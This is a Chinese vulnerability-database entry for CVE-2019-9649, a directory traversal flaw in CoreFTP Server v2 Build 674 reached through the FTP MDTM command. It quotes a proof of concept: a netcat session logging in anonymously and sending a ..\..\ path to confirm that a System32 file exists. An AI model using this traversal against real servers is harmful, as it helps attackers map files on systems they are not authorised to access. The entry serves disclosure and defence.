CoreFTP Server FTP和SFTP Server 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1532089 漏洞类型 路径遍历
发布时间 2019-03-11 更新时间 2019-03-11
CVE编号 CVE-2019-9649 CNNVD-ID CNNVD-201903-343
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://www.securityfocus.com/bid/107449
https://cxsecurity.com/issue/WLB-2019030104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201903-343
|漏洞详情
Core FTP是一款文件传输服务器。SFTP Server component是其中的一个加密传输组件。 Core FTP 2.0 Build 674版本中的SFTP Server组件存在目录遍历漏洞。远程攻击者可借助FTP MDTM命令利用该漏洞浏览根目录外的位置并确定所存在的文件。
|漏洞EXP
CVE-2019-9649

CoreFTP FTP / SFTP Server v2 - Build 674

MDTM Directory Traversal

Discovered By: Kevin Randall



Summary: By utilizing a directory traversal along with the FTP MDTM
command, an attacker can browse outside the root directory to determine if
a file exists based on return file size along with the date the file was
last modified by using a ..\..\ technique

Tools used:

Parrot OS VM

Windows 7 VM

FTP / SFTP Server v2 - Build 674

Netcat











Proof of Concept (PoC):



File 1: ARP.exe

Type of file: Application(.EXE)

Description: TCP/IP Arp Command

Location: C:\Windows\System32\

Size: 20.5 KB (20,992 bytes)

Size on disk: 24.0 KB (24,576 bytes)

Created: Monday July 13, 2009 7:55:11 PM

Modified: Monday July 13, 2009, 9:14:12 PM

Accessed: Monday July 13, 2009 7:55:11 PM



#nc -nv 192.168.0.2 21

(UNKNOWN) [192.168.0.2] 21 (ftp) open

220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago
Unregistered

USER anonymous

331 password required for anonymous

PASS anonymous@

230-Logged on

230

MDTM C:\..\..\..\..\..\..\Windows\System32\ARP.exe

213 20090713211412


|受影响的产品
Coreftp Core FTP 2.0 Build 676
|参考资料

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/152057/CoreFTP-Server-FTP-SFTP-Server-2-Build-674-MDTM-Directory-Traversal.html